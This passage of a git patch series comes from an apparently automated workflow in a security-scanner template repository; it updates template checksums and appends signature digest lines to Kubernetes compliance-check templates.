b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml @@ -40,4 +40,3 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument."' -# digest: 490a00463044022061ee1577d8528e7614d9ad92ed72f68f00426fc1d950015d2bef6fce8fbf285402207dd62ff126ce6129997240e3edc31f8adaf047cf5c341ba65b0ff1851b35ee99:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file From 5037d813e0152fed7dbeed7a5ae8621445dd67bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 11:12:53 +0000 Subject: [PATCH 0615/1841] Auto Generated Templates Checksum [Tue Jun 25 11:12:53 UTC 2024] :robot: --- templates-checksum.txt | 80 +++++++++++++++++++++--------------------- 1 file changed, 40 insertions(+), 40 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6aa2d5426a..24d9a0831b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -107,40 +107,40 @@ cloud/enum/gcp-app-engine-enum.yaml:735d4025743533df111b8bee9132eb2503019b92 cloud/enum/gcp-bucket-enum.yaml:954d5a61d8cceec64101392998396f4c48cb94c4 cloud/enum/gcp-firebase-app-enum.yaml:3fd3b413096838d123d31f2a7e3ccb02bc74dd73 cloud/enum/gcp-firebase-rtdb-enum.yaml:4bd510aa205a80e5b9db5572b16b90949d898842 -cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml:27be4204fdb7bda8d0b50115111a618aee85309b -cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml:69eab9d30b26e40ffd8bbe6c7ebcd3d98558177d -cloud/kubernetes/deployments/k8s-default-namespace-used.yaml:4af557093ab9b0433b98bc913876d5e160e30f85 -cloud/kubernetes/deployments/k8s-host-ports-check.yaml:98a9885144fd3119243dd1d22390c38d881f278e -cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml:19ce8cfe69ecc38b10d9d0d960e51da6a8ee8f8f -cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml:1bb4778a8c5c4d4b04b00f0f8616e4cd427fbd84 -cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml:d1edb4a457f26b17d826837196846b937360a389 -cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml:64435439d85ae23c7662bc88444397def9d49f9d -cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml:82bc234d45f417c646612bbbbea1869f75467243 -cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml:bbe067d8b4a85bc01a7ca4c1a17b2bafe0f53c47 -cloud/kubernetes/deployments/k8s-privileged-container.yaml:23223b34880c3a44dd897d7ee68d6edfddea32f2 -cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml:c42a606274e45058edaf0fb221293f9cdb2c1908 -cloud/kubernetes/deployments/k8s-root-container-admission.yaml:9a6bec6cd2caf0c2cd95ee35afb8d5b75c0bb613 -cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml:d82e9a10f97c52b015974536a7ee8ca05120d235 -cloud/kubernetes/kubernetes-code-env.yaml:1ef357323b24d5477c4b24be0555f4c328ce7d13 -cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml:9405572b0dffa908f828a1fb124b2bdbae9e5cad -cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml:529ba1c07c7c5e4d630c58966b6047ad995412a3 -cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml:3dd407fd0f9ac4ac1503876951018e2c4dc97266 -cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml:3d32959ad5728498163d5b1d444bdd4931e6b71c -cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml:7f1e720cac222017ab9a2d77972273ab22003b8b -cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml:f7bfc964fdf51ad1a66de068800e6ec4635be367 -cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml:86686d3fd919745a4d0bf4a5aa113364fbdcbf21 -cloud/kubernetes/pods/k8s-readonly-fs.yaml:6830b06adc4ea9bdef9f1d0e97c47c8333ca5f24 -cloud/kubernetes/pods/k8s-readonly-rootfs.yaml:2daf08d1c9326bc2a5b192777de464c8d4652388 -cloud/kubernetes/pods/k8s-root-user-id.yaml:94c464a272031c5b5c84bc3719d9590d666aabc0 -cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml:4fbf070d8382d41b34c177995b6a9a967c010470 -cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml:a8bf7f3947ca0a330557b70ff348ec842551ad67 -cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml:280725576fa47e63ebf9561a74f9287b4bb65b05 -cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml:c9e3a2041c02eac22ea359af120989b5c6532e98 -cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml:ee7084f1540cfab7647ea76d5b9a1a1d58c08e68 -cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml:a9cd19b005d52ffa783f2e4f8ed81f20b660d91c -cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml:22239f1645a99409f164a9379a19c28366458427 -cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml:6bb14c710820de370ea54ea58755bc77b6725604 -cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml:c19b97609ac053a8bf58f63c2db3558247a00bf7 +cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml:b0256d3b1e923f1963c68461752df9b1f337fbce +cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml:fe526a3b24b971f5b7635f1d1765940818998507 +cloud/kubernetes/deployments/k8s-default-namespace-used.yaml:c018176345e3e1d43616ee8cf049aa47842a2a7b +cloud/kubernetes/deployments/k8s-host-ports-check.yaml:42b730a989639685ab72c7aeebda4c250c240cfa +cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml:e6d20496208f0fb4a6aed171ae2ad872972f9d41 +cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml:725a8566dae96757f547ba91da59b9324920e330 +cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml:1103324f6546f227cd64e7d7c91b8046d2c6a4bf +cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml:5392c0b53975d2f42ddb031eba8c95050f315bfd +cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml:2e1acf1aacf206a5c08ee14ddac1dfe56812d7e5 +cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml:fbeebb2ddf1ffc946d39475fbbecfbcdf6b18f7d +cloud/kubernetes/deployments/k8s-privileged-container.yaml:803046749ae245267a75d51fda36d1c2ed20528e +cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml:17f199a4c7f0991b83d2f331c6d42b4c21c0a8f4 +cloud/kubernetes/deployments/k8s-root-container-admission.yaml:bfa89192646d55644ad992652f7d44c81477ab80 +cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml:a1ac40772edde2f855466c872d885903ba52aa9d +cloud/kubernetes/kubernetes-code-env.yaml:5a90adec609c6c3da3122ee8cb7607b713642070 +cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml:37b9b2aa40cc4cd83794197df7c81e8501f69071 +cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml:e8452c9d2d63afa32aad6dc8af77fa1c5b8e551c +cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml:87ac6dd8a417b887104048ba8cbc73fbb9a83602 +cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml:cfc000947d850498df71aac0dcd337cbd97523c6 +cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml:c7002bfb0e998a9180b1cf00d893a7fb679d28c7 +cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml:7b834fcf5af9d8502b89248093b33c502707f541 +cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml:36b728292e22fbf7aacf1603cc5dff4b597528c9 +cloud/kubernetes/pods/k8s-readonly-fs.yaml:37959e7218013ec30fa483288e131bdabac5b421 +cloud/kubernetes/pods/k8s-readonly-rootfs.yaml:514226d5f66ef22c02e7dc0b0a09fa420eeea921 +cloud/kubernetes/pods/k8s-root-user-id.yaml:9dc2d80779b85474681505b2e5db135e7d51c4d4 +cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml:f9bc836813c950599c9bd135cfb79537562ef11d +cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml:df501d7304572ac3c4f2dfe35615d519a301c120 +cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml:b17e3c5688c5b1096c1722be3cc5bd4f5421ee46 +cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml:ae3c64fa9ecac8af6a5b58466945fd128d70771f +cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml:80414c9007dea73037b67828ce1105347d739d18 +cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml:2b67984596aa68785f81ed560ccccc30d665f774 +cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml:7721783dcdcc628d0eb9aed1ed5f584a9122fdb8 +cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml:73c75c1fccc2f0183e0282748146186307be911a +cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml:660655b72822ba9fd76acb213d71748fd597091e code/cves/2019/CVE-2019-14287.yaml:4bac98e672bcc82f1fdb764079e0c1b087e59b12 code/cves/2021/CVE-2021-3156.yaml:4df2c2fa45f3503655f6ed1b743668b82afda3f5 code/cves/2023/CVE-2023-2640.yaml:08c6ebd7086926c0712bc1ecc78353604883a385 @@ -524,7 +524,7 @@ file/malware/hash/anthem-deeppanda-malware-hash.yaml:bb3642fcf6638c330f08d8dae54 file/malware/hash/applejeus-malware-hash.yaml:4865b8c3e03b53c144d9370b16a1befe92af894c file/malware/hash/avburner-malware-hash.yaml:27fc3e8dad2eb7a775ae263fa06a573a91c45e4f file/malware/hash/backwash-malware-hash.yaml:75e9529b4fa6c80619d2ab92063bc0b75bdb3aba -file/malware/hash/blackenergy-driver-amdide-hash.yaml:158b40f13084aa47257fe805b1ce701206c63dd0 +file/malware/hash/blackenergy-driver-amdide-hash.yaml:c8b4e4b7506df26cbbadc86cd3fba9368895b1ec file/malware/hash/blackenergy-driver-malware-hash.yaml:6b27b5f6419a81d81d495aaf0ea4055eb88d67e6 file/malware/hash/blackenergy-killdisk-malware-hash.yaml:417cb6add69482352064dedd30a62028527af0af file/malware/hash/blackenergy-ssh-malware-hash.yaml:bd8231fc3a0966f01ec85bcd3c70ccfd54bed031 @@ -558,20 +558,20 @@ file/malware/hash/ironpanda-malware-hash.yaml:a0a2d303efe23e2f7b77434f5e9b16a1a4 file/malware/hash/locky-ransomware-hash.yaml:5d567c1fcaf1703d2837c4a4af2e3bd889d8766d file/malware/hash/minidionis-readerview-malware-hash.yaml:1ac390045933b5157feb70eb37a93ceacf147136 file/malware/hash/minidionis-vbs-malware-hash.yaml:40aaafab8cc281de9906e658e879c89251d8b291 -file/malware/hash/naikon-apt-malware-hash.yaml:e50a339b227bb5a6a738d39753adf5cca007a25b +file/malware/hash/naikon-apt-malware-hash.yaml:ec6c654cb06cf683b93d4dccb462109c5c17d869 file/malware/hash/neuron2-malware-hash.yaml:d2626f562e3f7c7be40fdda0180affe41ea1b14b file/malware/hash/oilrig-malware-hash.yaml:002591392ad1acf55c3034218b36bb7b992a442f file/malware/hash/passcv-ntscan-malware-hash.yaml:faff7de8b889f5015b7cfaa428382850549fbb40 file/malware/hash/passcv-sabre-malware-hash.yaml:88556ab3408121a616af39d8fecbfe0447dd3777 file/malware/hash/passcv-signingcert-malware-hash.yaml:3da724d67f1832b5518c8b31054122e1f9aa9957 -file/malware/hash/petya-ransomware-hash.yaml:06a5bd0fe7381407ae15c0d49db9605d75df14e4 +file/malware/hash/petya-ransomware-hash.yaml:48bc6af00a400891563c75b4cb0da804f003b7ba file/malware/hash/poseidongroup-maldoc-malware-hash.yaml:466f570c989143ced35f2ab1e82b819ccb5e6887 file/malware/hash/poseidongroup-malware-hash.yaml:516f861330f2af629758648e3a7daf913ce2cce7 file/malware/hash/powerstar-malware-hash.yaml:b1dae0703f67f8c8d7b013687fb5a6b776192900 -file/malware/hash/purplewave-malware-hash.yaml:d2a611217f3c875c068171f44b2af09fdbff3368 +file/malware/hash/purplewave-malware-hash.yaml:eae46c04f4e1b6809b2c4cf65ea55cac516f9f95 file/malware/hash/red-leaves-malware-hash.yaml:f8f0b24847246e20aa9bceefe02e2fad940a6e66 file/malware/hash/regeorg-webshell-hash.yaml:3b37f461bfcefbcb0c81d03fab96295456bf5f2a -file/malware/hash/revil-ransomware-hash.yaml:5bb9bc2c27ee1825e48b3974a70ed7c0d39650dc +file/malware/hash/revil-ransomware-hash.yaml:290f730ee3f670cdf4758beac4012afbe2ae38a9 file/malware/hash/rokrat-malware-hash.yaml:6aa086d47148b9abb0075fbe1f39eb24b552b18d file/malware/hash/sauron-malware-hash.yaml:ba6ad6e4659c5250b159a3513107e3b458d0cc7a file/malware/hash/seaduke-malware-hash.yaml:935de90d644686ad270d5ad8bd43a54916e213f9 @@ -8789,7 +8789,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3c7701d565ced152c0518c8c47ee771b1eb2e9ac +templates-checksum.txt:e823d11771aba159bcd020118af071a8f6370f67 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 885b0f30ef7da94993b1429bdcad24d893462756 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 11:14:32 +0000 Subject: [PATCH 0616/1841] Auto Template Signing [Tue Jun 25 11:14:32 UTC 2024] :robot: --- cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml | 1 + cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml | 1 + cloud/kubernetes/deployments/k8s-default-namespace-used.yaml | 1 + cloud/kubernetes/deployments/k8s-host-ports-check.yaml | 1 + cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml | 1 + cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml | 1 + .../deployments/k8s-liveness-probe-not-configured.yaml | 1 + cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml | 1 + cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml | 1 + .../kubernetes/deployments/k8s-minimize-added-capabilities.yaml | 1 + cloud/kubernetes/deployments/k8s-privileged-container.yaml | 1 + cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml | 1 + cloud/kubernetes/deployments/k8s-root-container-admission.yaml | 1 + cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml | 1 + cloud/kubernetes/kubernetes-code-env.yaml | 1 + cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml | 1 + cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml | 1 + cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml | 1 + cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml | 1 + cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml | 1 + cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml | 1 + cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml | 1 + cloud/kubernetes/pods/k8s-readonly-fs.yaml | 1 + cloud/kubernetes/pods/k8s-readonly-rootfs.yaml | 1 + cloud/kubernetes/pods/k8s-root-user-id.yaml | 1 + cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml | 1 + cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml | 1 + cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml | 1 + cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml | 1 + cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml | 1 + .../kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml | 1 + cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml | 1 + .../kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml | 1 + cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml | 1 + 34 files changed, 34 insertions(+) diff --git a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml index 2f46aa8da1..8a7cc0ed3e 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml @@ -46,3 +46,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022064b9824c34dbebcb7d936cbbf3122ceded2d676ef71282c84107d3d18a0602320221008dff215249847ff57a2283c9b3ff4fe970ed648f23817c50be51ecb16994fdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml index cafc8c7a9c..36165e053c 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml @@ -46,3 +46,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100ce064fde6c02b2150739c4c898294016cbeabcf9da5ae8b4fce69862fb4c0b380220263897bc6d527e5e9ce91b2211864cbb8c373c2e1b168087d5b7b846704a067b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml index 7f40c7120c..8573116230 100644 --- a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml +++ b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml @@ -45,3 +45,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100cb1a8cc055b7e8807ef5dad291c1259028e3d518155d9340c1fe72cb8a6cfad902201644f419892fe61eeb0bccd7e89bf5e57e87cdfb23374f91551df421236c4585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml index 91d9c7701c..4b3fd6ccea 100644 --- a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml +++ b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml @@ -47,3 +47,4 @@ javascript: - type: dsl dsl: - response +# digest: 490a00463044022011532f20237cf541dbf6f961b6c194239b93619beb27129817c467cd266c48e90220338b47466ecff7995c0c920a541f2ec4bc5d7d062ddaf96260079033ceee08eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml index 3dbbce63c2..173f436c52 100644 --- a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml +++ b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml @@ -45,3 +45,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a0047304502202f64c7e602834310b2e9a8c304d75b632cd1588374ae925560e396b61b209068022100c443b2a1a22e5404a2d851928394720efdbed1798415a186e6e0fef8f6001d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml index 910389489c..dd8f7d9a1a 100644 --- a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml +++ b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml @@ -49,3 +49,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a0047304502204c105ff1b822e567af2ce98c74e1e13063716f81e3a93ab2a152fad3c6c58980022100ad676934438a11bcd3abfd6e00f12dd0f05fb4b1eb0dea56546bb3db994ded45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml index 8c72b9b9dd..3ad0858c5a 100644 --- a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml +++ b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a0047304502203467396f69842d95717ea1f6208909f0301e79ef8e16b19ad5e20978826124f2022100b31af5d5f6daf8463350c27aaf6398d6f27378fa5858cc4f1908749790a1dcc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml index 7a7dd42476..81f64d507d 100644 --- a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 490a00463044022069a4646a0a3d856a79d0af6dc2b73cdd7b2835038feb1d5598a4f86577786994022063f8b629719eefe92da4c7c879e1828b087f04d37360ce743b62305d4f395730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml index 53dc9ce6af..0366530323 100644 --- a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a00483046022100ae7c1c49b3e8f2afdad758ffeaea087dd5d811cf1b8183d2e4ee53b0dabdc51f0221009e2889066edaae078f4fdf8a31f77e108530839cdab907fa37589501d461773c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml index 80f5bd596a..af1913761a 100644 --- a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml +++ b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml @@ -48,3 +48,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100f45040f69d006ec672d4f4c04146b729cb7c5abcba703a8bbaa2da551013400202204e9b59dbad6d6e89badbb11aa795afa27f33eea1f026085e5f926675ac6cea68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-privileged-container.yaml b/cloud/kubernetes/deployments/k8s-privileged-container.yaml index e3e31342a4..7fca8ef643 100644 --- a/cloud/kubernetes/deployments/k8s-privileged-container.yaml +++ b/cloud/kubernetes/deployments/k8s-privileged-container.yaml @@ -49,3 +49,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100b7c380b0fdf17140426a4a3f480f73ec33789c08b9975e1206a6c1078a2d6b45022012b453c2fe3a6501a2aebafbc2ff35422c301b9d7c8c0973cf666de045e5b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml index 90c75fe195..9910b6b8ec 100644 --- a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml @@ -45,3 +45,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a00483046022100c6a0f6296b693f56a70b84b9c521f990219221bf26e0b04d4a77c1bd1a39799a022100ecc56b0184771d6ce9e5620bc111adbcd68cb0b1c8de331956e3804dbe355685:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml index 4bc26452c0..76c5182ff8 100644 --- a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml +++ b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml @@ -45,3 +45,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100f14d422cbd57235a92be20140747bc11a4f73ab68bae70297a73e83b90da0e2b02200b47eb6fcdc4533cd22fe335ae241fd43a20d85df6f259b12d6b909cdd59dfbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml index a4ff20d305..5d66a131bc 100644 --- a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml +++ b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml @@ -50,3 +50,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a0048304602210088b5afd30016fb2a61fd300e6a13bfa07252a0d4972eb11b70583499ab79a4c20221009aba524227d19ead61e2c75a7b2840b90b708f236054cedf8b3531fb4e3ee49b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/kubernetes-code-env.yaml b/cloud/kubernetes/kubernetes-code-env.yaml index 17072abfd9..df0a8dfa85 100644 --- a/cloud/kubernetes/kubernetes-code-env.yaml +++ b/cloud/kubernetes/kubernetes-code-env.yaml @@ -28,3 +28,4 @@ code: - type: dsl dsl: - '"kubectl is successfully connected to the Kubernetes API Server Version: " + server_version' +# digest: 490a0046304402202ea803bac221808c48698a2289e0aaa46ca09e452a4e4de0c913e63fde782cf4022032c41ffef97ff3963c2e8c1ea22764bcab0a6258bdb93e32f4318234c842f24c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml index a1e716471d..9997dd0f9b 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100cab8502b8046e7ecf04c896fd8367a118f6fa5f4a4b29b06f90a31e4c7e2bc910220761d406117dce7f3116e5426ad24d79d82a1e9e6161fa944fa8195c498144eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml index ea945e764e..a55af37ef0 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml @@ -45,3 +45,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a00483046022100a7a99b20e705b40f456f020120dbdc38203e9c7f83d53b71bbc0af6797ee66260221009031e85d86065e75668a3ec1dfeb488792ceb00272ad63592f819e073d410d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml index 2494492dcf..1f1751e674 100644 --- a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml @@ -45,3 +45,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100d225b4ed37ec5deb1b364b52b2db205bffb08d4c712940221be0d4a24c471f75022025482dd2adbab336f0b0dda3ed30272390ddd93780dd1cd41d6f6e1ceea8e096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml index f40f9d8203..ffb48dc110 100644 --- a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -47,3 +47,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100b82b8a61d07a1fd3eb1d4c0e294e1c0ad03620d317280f0708493d3422a9654002207d8421e313c2d1eb9c5c6e0f5efc9193088d15ebe536aa77e70a0104ced336c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml index 9c8f2bf72b..ba3b118f80 100644 --- a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml +++ b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a004830460221008e39125e4e88cd6fdf4a7a42cb65ed28ad966f3e82c707981a3a9b61eda975ee022100b7740c6607e3cd3abc78a7ce0787b992b3a7c2a1982f98696000b083db97e7f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml index b39a650a22..b53b50979e 100644 --- a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml +++ b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml @@ -44,3 +44,4 @@ javascript: - type: 